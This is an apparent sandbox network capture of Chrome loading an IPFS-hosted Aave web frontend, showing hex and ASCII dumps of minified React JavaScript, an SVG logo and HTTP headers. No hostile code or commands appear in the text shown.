                                                                                                                                                                                                                                                  2024-09-28 04:11:57 UTC1369INData Raw: 28 30 2c 64 2e 5a 29 28 28 30 2c 75 2e 6a 73 78 29 28 22 70 61 74 68 22 2c 7b 64 3a 22 4d 31 39 20 33 48 35 63 2d 31 2e 31 20 30 2d 32 20 2e 39 2d 32 20 32 76 31 34 63 30 20 31 2e 31 2e 39 20 32 20 32 20 32 68 31 34 63 31 2e 31 20 30 20 32 2d 2e 39 20 32 2d 32 56 35 63 30 2d 31 2e 31 2d 2e 39 2d 32 2d 32 2d 32 7a 6d 2d 32 20 31 30 48 37 76 2d 32 68 31 30 76 32 7a 22 7d 29 2c 22 49 6e 64 65 74 65 72 6d 69 6e 61 74 65 43 68 65 63 6b 42 6f 78 22 29 2c 78 3d 74 28 33 36 36 32 32 29 2c 66 3d 74 28 37 38 38 38 34 29 2c 6d 3d 74 28 38 31 37 31 39 29 2c 6a 3d 74 28 33 34 38 36 37 29 3b 66 75 6e 63 74 69 6f 6e 20 62 28 65 29 7b 72 65 74 75 72 6e 28 30 2c 6a 2e 5a 29 28 22 4d 75 69 43 68 65 63 6b 62 6f 78 22 2c 65 29 7d 76 61 72 20 67 3d 28 30 2c 74 28 31 35 38 38
                                                                                                                                                                                                                                                  Data Ascii: (0,d.Z)((0,u.jsx)("path",{d:"M19 3H5c-1.1 0-2 .9-2 2v14c0 1.1.9 2 2 2h14c1.1 0 2-.9 2-2V5c0-1.1-.9-2-2-2zm-2 10H7v-2h10v2z"}),"IndeterminateCheckBox"),x=t(36622),f=t(78884),m=t(81719),j=t(34867);function b(e){return(0,j.Z)("MuiCheckbox",e)}var g=(0,t(1588
                                                                                                                                                                                                                                                  2024-09-28 04:11:57 UTC1369INData Raw: 3b 76 61 72 20 5a 3d 61 2e 66 6f 72 77 61 72 64 52 65 66 28 28 66 75 6e 63 74 69 6f 6e 28 65 2c 72 29 7b 76 61 72 20 74 2c 73 3b 63 6f 6e 73 74 20 6c 3d 28 30 2c 66 2e 5a 29 28 7b 70 72 6f 70 73 3a 65 2c 6e 61 6d 65 3a 22 4d 75 69 43 68 65 63 6b 62 6f 78 22 7d 29 2c 7b 63 68 65 63 6b 65 64 49 63 6f 6e 3a 64 3d 77 2c 63 6f 6c 6f 72 3a 70 3d 22 70 72 69 6d 61 72 79 22 2c 69 63 6f 6e 3a 76 3d 50 2c 69 6e 64 65 74 65 72 6d 69 6e 61 74 65 3a 68 3d 21 31 2c 69 6e 64 65 74 65 72 6d 69 6e 61 74 65 49 63 6f 6e 3a 6d 3d 6b 2c 69 6e 70 75 74 50 72 6f 70 73 3a 6a 2c 73 69 7a 65 3a 67 3d 22 6d 65 64 69 75 6d 22 2c 63 6c 61 73 73 4e 61 6d 65 3a 5a 7d 3d 6c 2c 43 3d 28 30 2c 6e 2e 5a 29 28 6c 2c 79 29 2c 49 3d 68 3f 6d 3a 76 2c 45 3d 68 3f 6d 3a 64 2c 53 3d 28 30 2c 6f
                                                                                                                                                                                                                                                  Data Ascii: ;var Z=a.forwardRef((function(e,r){var t,s;const l=(0,f.Z)({props:e,name:"MuiCheckbox"}),{checkedIcon:d=w,color:p="primary",icon:v=P,indeterminate:h=!1,indeterminateIcon:m=k,inputProps:j,size:g="medium",className:Z}=l,C=(0,n.Z)(l,y),I=h?m:v,E=h?m:d,S=(0,o
                                                                                                                                                                                                                                                  2024-09-28 04:11:57 UTC1369INData Raw: 65 74 65 72 73 20 6f 72 20 3c 30 3e 3c 31 3e 63 6f 70 79 20 74 68 65 20 65 72 72 6f 72 3c 2f 31 3e 3c 2f 30 3e 22 2c 63 6f 6d 70 6f 6e 65 6e 74 73 3a 7b 30 3a 28 30 2c 63 2e 6a 73 78 29 28 61 2e 5a 2c 7b 73 78 3a 7b 76 65 72 74 69 63 61 6c 41 6c 69 67 6e 3a 22 74 6f 70 22 7d 2c 6f 6e 43 6c 69 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 61 76 69 67 61 74 6f 72 2e 63 6c 69 70 62 6f 61 72 64 2e 77 72 69 74 65 54 65 78 74 28 72 2e 72 61 77 45 72 72 6f 72 2e 6d 65 73 73 61 67 65 2e 74 6f 53 74 72 69 6e 67 28 29 29 7d 7d 29 2c 31 3a 28 30 2c 63 2e 6a 73 78 29 28 6f 2e 5a 2c 7b 76 61 72 69 61 6e 74 3a 22 64 65 73 63 72 69 70 74 69 6f 6e 22 7d 29 7d 7d 29 7d 29 7d 29 7d 7d 2c 35 39 37 38 36 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 72 2c 74 29 7b
                                                                                                                                                                                                                                                  Data Ascii: eters or <0><1>copy the error</1></0>",components:{0:(0,c.jsx)(a.Z,{sx:{verticalAlign:"top"},onClick:function(){return navigator.clipboard.writeText(r.rawError.message.toString())}}),1:(0,c.jsx)(o.Z,{variant:"description"})}})})})}},59786:function(e,r,t){
                                                                                                                                                                                                                                                  2024-09-28 04:11:57 UTC1369INData Raw: 2e 6d 61 69 6e 54 78 53 74 61 74 65 2c 6c 3d 61 2e 73 65 74 4d 61 69 6e 54 78 53 74 61 74 65 2c 64 3d 61 2e 73 65 74 54 78 45 72 72 6f 72 2c 75 3d 61 2e 73 65 74 47 61 73 4c 69 6d 69 74 2c 70 3d 28 30 2c 4d 2e 7a 29 28 29 2e 67 6f 76 65 72 6e 61 6e 63 65 56 33 53 65 72 76 69 63 65 2c 76 3d 28 30 2c 62 2e 5a 29 28 29 2e 73 65 6e 64 54 78 2c 68 3d 28 30 2c 41 2e 4e 4c 29 28 29 2c 78 3d 28 30 2c 79 2e 59 29 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 5b 65 2e 61 63 63 6f 75 6e 74 2c 65 2e 65 73 74 69 6d 61 74 65 47 61 73 4c 69 6d 69 74 2c 65 2e 61 64 64 54 72 61 6e 73 61 63 74 69 6f 6e 5d 7d 29 29 2c 66 3d 28 30 2c 63 2e 5a 29 28 78 2c 33 29 2c 6d 3d 66 5b 30 5d 2c 6a 3d 66 5b 31 5d 2c 4f 3d 66 5b 32 5d 2c 77 3d 66 75 6e 63 74 69 6f 6e 28 29
                                                                                                                                                                                                                                                  Data Ascii: .mainTxState,l=a.setMainTxState,d=a.setTxError,u=a.setGasLimit,p=(0,M.z)().governanceV3Service,v=(0,b.Z)().sendTx,h=(0,A.NL)(),x=(0,y.Y)((function(e){return[e.account,e.estimateGasLimit,e.addTransaction]})),f=(0,c.Z)(x,3),m=f[0],j=f[1],O=f[2],w=function()
                                                                                                                                                                                                                                                  2024-09-28 04:11:57 UTC1369INData Raw: 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6e 3d 6e 2e 66 69 6c 74 65 72 28 28 66 75 6e 63 74 69 6f 6e 28 72 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 72 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 29 2c 74 2e 70 75 73 68 2e 61 70 70 6c 79 28 74 2c 6e 29 7d 72 65 74 75 72 6e 20 74 7d 66 75 6e 63 74 69 6f 6e 20 5f 28 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 31 3b 72 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 72 2b 2b 29 7b 76 61 72 20 74 3d 6e 75 6c 6c 21 3d 61 72 67 75 6d 65 6e 74
                                                                                                                                                                                                                                                  Data Ascii: if(Object.getOwnPropertySymbols){var n=Object.getOwnPropertySymbols(e);r&&(n=n.filter((function(r){return Object.getOwnPropertyDescriptor(e,r).enumerable}))),t.push.apply(t,n)}return t}function _(e){for(var r=1;r<arguments.length;r++){var t=null!=argument
                                                                                                                                                                                                                                                  2024-09-28 04:11:57 UTC1369INData Raw: 65 6e 3a 28 30 2c 42 2e 6a 73 78 29 28 42 2e 46 72 61 67 6d 65 6e 74 2c 7b 7d 29 7d 29 3a 28 30 2c 42 2e 6a 73 78 73 29 28 75 2e 5a 2c 7b 73 78 3a 7b 6d 3a 2d 33 7d 2c 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 42 2e 6a 73 78 29 28 75 2e 5a 2c 7b 73 78 3a 7b 70 3a 33 7d 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 42 2e 6a 73 78 29 28 5a 2e 45 2c 7b 74 69 74 6c 65 3a 22 45 64 69 74 20 61 64 64 72 65 73 73 22 7d 29 7d 29 2c 57 26 26 21 54 26 26 28 30 2c 42 2e 6a 73 78 29 28 49 2e 49 2c 7b 6e 65 74 77 6f 72 6b 4e 61 6d 65 3a 46 2e 6e 61 6d 65 2c 63 68 61 69 6e 49 64 3a 56 7d 29 2c 28 30 2c 42 2e 6a 73 78 29 28 70 2e 5a 2c 7b 64 69 72 65 63 74 69 6f 6e 3a 22 63 6f 6c 75 6d 6e 22 2c 67 61 70 3a 32 2c 63 68 69 6c 64 72 65 6e 3a 4c 2e 6d 61 70 28 28 66 75 6e 63 74 69 6f
                                                                                                                                                                                                                                                  Data Ascii: en:(0,B.jsx)(B.Fragment,{})}):(0,B.jsxs)(u.Z,{sx:{m:-3},children:[(0,B.jsx)(u.Z,{sx:{p:3},children:(0,B.jsx)(Z.E,{title:"Edit address"})}),W&&!T&&(0,B.jsx)(I.I,{networkName:F.name,chainId:V}),(0,B.jsx)(p.Z,{direction:"column",gap:2,children:L.map((functio
                                                                                                                                                                                                                                                  2024-09-28 04:11:57 UTC1369INData Raw: 73 61 62 6c 65 64 3a 65 2e 72 65 6d 6f 76 65 2c 66 75 6c 6c 57 69 64 74 68 3a 21 30 2c 69 6e 70 75 74 50 72 6f 70 73 3a 7b 73 78 3a 7b 70 79 3a 32 2c 70 78 3a 33 2c 66 6f 6e 74 53 69 7a 65 3a 22 31 34 70 78 22 7d 7d 2c 65 6e 64 41 64 6f 72 6e 6d 65 6e 74 3a 22 22 3d 3d 3d 65 2e 72 65 70 72 65 73 65 6e 74 61 74 69 76 65 7c 7c 65 2e 69 6e 76 61 6c 69 64 3f 6e 75 6c 6c 3a 28 30 2c 42 2e 6a 73 78 29 28 64 2e 5a 2c 7b 66 6f 6e 74 53 69 7a 65 3a 22 73 6d 61 6c 6c 22 2c 63 6f 6c 6f 72 3a 22 73 75 63 63 65 73 73 22 7d 29 2c 6f 6e 43 68 61 6e 67 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 21 66 75 6e 63 74 69 6f 6e 28 65 2c 72 29 7b 76 61 72 20 74 3d 28 30 2c 6d 2e 69 73 41 64 64 72 65 73 73 29 28 65 29 3b 4e 28 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 6f
                                                                                                                                                                                                                                                  Data Ascii: sabled:e.remove,fullWidth:!0,inputProps:{sx:{py:2,px:3,fontSize:"14px"}},endAdornment:""===e.representative||e.invalid?null:(0,B.jsx)(d.Z,{fontSize:"small",color:"success"}),onChange:function(e){!function(e,r){var t=(0,m.isAddress)(e);N((function(n){var o
                                                                                                                                                                                                                                                  2024-09-28 04:11:57 UTC1369INData Raw: 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 72 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 29 2c 74 2e 70 75 73 68 2e 61 70 70 6c 79 28 74 2c 6e 29 7d 72 65 74 75 72 6e 20 74 7d 66 75 6e 63 74 69 6f 6e 20 67 28 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 31 3b 72 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 72 2b 2b 29 7b 76 61 72 20 74 3d 6e 75 6c 6c 21 3d 61 72 67 75 6d 65 6e 74 73 5b 72 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 72 5d 3a 7b 7d 3b 72 25 32 3f 62 28 4f 62 6a 65 63 74 28 74 29 2c 21 30 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 72 29 7b 28 30 2c 6e 2e 5a 29 28 65 2c 72 2c 74 5b 72 5d 29 7d 29 29 3a 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79
                                                                                                                                                                                                                                                  Data Ascii: n Object.getOwnPropertyDescriptor(e,r).enumerable}))),t.push.apply(t,n)}return t}function g(e){for(var r=1;r<arguments.length;r++){var t=null!=arguments[r]?arguments[r]:{};r%2?b(Object(t),!0).forEach((function(r){(0,n.Z)(e,r,t[r])})):Object.getOwnProperty


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  121192.168.2.549846209.94.90.34431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:57 UTC468OUTGET /aave.svg HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:57 UTC1194INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:57 GMT
                                                                                                                                                                                                                                                  Content-Type: image/svg+xml
                                                                                                                                                                                                                                                  Content-Length: 1831
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreigoevbfk3e6wgsdoutgckgo6fjzmcd2lc4ah4qiha43436iprtzaa"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/aave.svg
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafkreigoevbfk3e6wgsdoutgckgo6fjzmcd2lc4ah4qiha43436iprtzaa
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-dc13-09
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Age: 3
                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                  CF-RAY: 8ca0e474de6f4394-EWR
                                                                                                                                                                                                                                                  2024-09-28 04:11:57 UTC175INData Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 38 30 30 22 20 68 65 69 67 68 74 3d 22 38 30 30 22 3e 3c 64 65 66 73 3e 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 20 69 64 3d 22 62 22 20 78 31 3d 22 2e 39 30 37 22 20 79 31 3d 22 2e 32 32 37 22 20 78 32 3d 22 2e 31 36 33 22 20 79 32 3d 22 2e 38 35 33 22 20 67 72 61 64 69 65 6e 74 55 6e 69 74 73 3d 22 6f 62 6a 65 63 74 42 6f 75 6e 64 69 6e 67 42 6f 78 22 3e 3c 73 74 6f 70 20 6f
                                                                                                                                                                                                                                                  Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" width="800" height="800"><defs><linearGradient id="b" x1=".907" y1=".227" x2=".163" y2=".853" gradientUnits="objectBoundingBox"><stop o
                                                                                                                                                                                                                                                  2024-09-28 04:11:57 UTC1369INData Raw: 66 66 73 65 74 3d 22 30 22 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 62 36 35 30 39 65 22 2f 3e 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 31 22 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 32 65 62 61 63 36 22 2f 3e 3c 2f 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 3e 3c 63 6c 69 70 50 61 74 68 20 69 64 3d 22 61 22 3e 3c 70 61 74 68 20 64 3d 22 4d 30 20 30 68 38 30 30 76 38 30 30 48 30 7a 22 2f 3e 3c 2f 63 6c 69 70 50 61 74 68 3e 3c 66 69 6c 74 65 72 20 69 64 3d 22 63 22 20 78 3d 22 32 35 31 2e 32 35 22 20 79 3d 22 31 38 32 2e 32 35 22 20 77 69 64 74 68 3d 22 32 39 38 2e 32 30 35 22 20 68 65 69 67 68 74 3d 22 34 33 34 2e 36 36 22 20 66 69 6c 74 65 72 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 3e 3c 66 65 4f 66 66 73 65 74 2f 3e 3c 66 65
                                                                                                                                                                                                                                                  Data Ascii: ffset="0" stop-color="#b6509e"/><stop offset="1" stop-color="#2ebac6"/></linearGradient><clipPath id="a"><path d="M0 0h800v800H0z"/></clipPath><filter id="c" x="251.25" y="182.25" width="298.205" height="434.66" filterUnits="userSpaceOnUse"><feOffset/><fe
                                                                                                                                                                                                                                                  2024-09-28 04:11:57 UTC287INData Raw: 31 2e 38 34 33 20 33 30 2e 32 31 36 20 32 36 2e 34 31 20 33 30 2e 32 31 36 20 31 34 2e 35 34 32 20 30 20 32 36 2e 33 36 37 2d 31 33 2e 35 35 35 20 32 36 2e 33 36 37 2d 33 30 2e 32 31 36 2d 2e 30 30 33 2d 31 36 2e 36 37 38 2d 31 31 2e 38 32 38 2d 33 30 2e 32 34 32 2d 32 36 2e 33 36 37 2d 33 30 2e 32 34 32 5a 6d 2d 31 30 39 2e 35 20 30 63 2d 31 34 2e 35 33 33 20 30 2d 32 36 2e 33 36 37 20 31 33 2e 35 36 34 2d 32 36 2e 33 36 37 20 33 30 2e 32 34 32 20 30 20 31 36 2e 36 36 31 20 31 31 2e 38 33 34 20 33 30 2e 32 31 36 20 32 36 2e 33 36 37 20 33 30 2e 32 31 36 73 32 36 2e 33 37 35 2d 31 33 2e 35 35 35 20 32 36 2e 33 37 35 2d 33 30 2e 32 31 36 63 2d 2e 30 30 31 2d 31 36 2e 36 37 38 2d 31 31 2e 38 33 35 2d 33 30 2e 32 34 32 2d 32 36 2e 33 37 35 2d 33 30 2e 32 34
                                                                                                                                                                                                                                                  Data Ascii: 1.843 30.216 26.41 30.216 14.542 0 26.367-13.555 26.367-30.216-.003-16.678-11.828-30.242-26.367-30.242Zm-109.5 0c-14.533 0-26.367 13.564-26.367 30.242 0 16.661 11.834 30.216 26.367 30.216s26.375-13.555 26.375-30.216c-.001-16.678-11.835-30.242-26.375-30.24


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  122192.168.2.549849209.94.90.34431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:57 UTC504OUTGET /_next/static/chunks/2284-c8e8c4a9494b7235.js HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:57 UTC1360INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:57 GMT
                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                  Content-Length: 50864
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreihlmvtgs4jqi5a6ww7cju7qugihdszpnnvj2svy4awf7wrzpms3qu"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/_next/static/chunks/2284-c8e8c4a9494b7235.js
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeibkk2t3wa2shw62jhntzsugx2oh7gf6zlbu3gb6gdxmeuwt6wi6se,bafybeihww4l5iuauf4leipzwanhudgpdxwdltpxcn6hqqud65jpcaq33xe,bafybeigaj3cwdjktvw36akiq43niv2siihkxaslemvv33lw5mhruragm5a,bafkreihlmvtgs4jqi5a6ww7cju7qugihdszpnnvj2svy4awf7wrzpms3qu
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-dc13-08
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Age: 7464285
                                                                                                                                                                                                                                                  2024-09-28 04:11:57 UTC104INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 61 30 65 34 37 34 62 39 61 38 34 32 37 33 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: Accept-Ranges: bytesServer: cloudflareCF-RAY: 8ca0e474b9a84273-EWRalt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                  2024-09-28 04:11:57 UTC1369INData Raw: 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 32 32 38 34 5d 2c 7b 33 36 39 31 39 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 72 3d 6e 28 35 31 38 33 33 29 3b 66 75 6e 63 74 69 6f 6e 20 69 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 6e 20 69 6e 20 65 29 6f 28 65 2c 6e 29 26 26 28 74 5b 6e 5d 3d 65 5b 6e 5d 29 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 74 2c 65 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 74 2c 65 29 7d 74 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 28 74
                                                                                                                                                                                                                                                  Data Ascii: (self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[2284],{36919:function(t,e,n){"use strict";var r=n(51833);function i(t,e){for(var n in e)o(e,n)&&(t[n]=e[n])}function o(t,e){return Object.prototype.hasOwnProperty.call(t,e)}t.exports=function(t){r(t
                                                                                                                                                                                                                                                  2024-09-28 04:11:57 UTC1369INData Raw: 65 6f 66 20 6e 2e 73 65 63 74 69 6f 6e 29 26 26 69 28 74 2c 6e 2e 73 65 63 74 69 6f 6e 29 3b 72 65 74 75 72 6e 20 74 7d 28 6e 2c 65 29 7d 66 2e 65 6e 67 69 6e 65 73 3d 63 2c 66 2e 73 74 72 69 6e 67 69 66 79 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 72 65 74 75 72 6e 22 73 74 72 69 6e 67 22 3d 3d 3d 74 79 70 65 6f 66 20 74 26 26 28 74 3d 66 28 74 2c 6e 29 29 2c 61 28 74 2c 65 2c 6e 29 7d 2c 66 2e 72 65 61 64 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 63 6f 6e 73 74 20 6e 3d 66 28 72 2e 72 65 61 64 46 69 6c 65 53 79 6e 63 28 74 2c 22 75 74 66 38 22 29 2c 65 29 3b 72 65 74 75 72 6e 20 6e 2e 70 61 74 68 3d 74 2c 6e 7d 2c 66 2e 74 65 73 74 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 72 65 74 75 72 6e 20 70 2e 73 74 61 72 74 73 57 69 74 68 28 74 2c
                                                                                                                                                                                                                                                  Data Ascii: eof n.section)&&i(t,n.section);return t}(n,e)}f.engines=c,f.stringify=function(t,e,n){return"string"===typeof t&&(t=f(t,n)),a(t,e,n)},f.read=function(t,e){const n=f(r.readFileSync(t,"utf8"),e);return n.path=t,n},f.test=function(t,e){return p.startsWith(t,
                                                                                                                                                                                                                                                  2024-09-28 04:11:57 UTC1369INData Raw: 73 3d 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3b 65 6e 67 69 6e 65 73 2e 79 61 6d 6c 3d 7b 70 61 72 73 65 3a 79 61 6d 6c 2e 73 61 66 65 4c 6f 61 64 2e 62 69 6e 64 28 79 61 6d 6c 29 2c 73 74 72 69 6e 67 69 66 79 3a 79 61 6d 6c 2e 73 61 66 65 44 75 6d 70 2e 62 69 6e 64 28 79 61 6d 6c 29 7d 2c 65 6e 67 69 6e 65 73 2e 6a 73 6f 6e 3d 7b 70 61 72 73 65 3a 4a 53 4f 4e 2e 70 61 72 73 65 2e 62 69 6e 64 28 4a 53 4f 4e 29 2c 73 74 72 69 6e 67 69 66 79 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 63 6f 6e 73 74 20 6e 3d 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 7b 72 65 70 6c 61 63 65 72 3a 6e 75 6c 6c 2c 73 70 61 63 65 3a 32 7d 2c 65 29 3b 72 65 74 75 72 6e 20 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 2c 6e 2e 72 65 70 6c 61 63 65 72 2c 6e 2e 73 70 61 63 65
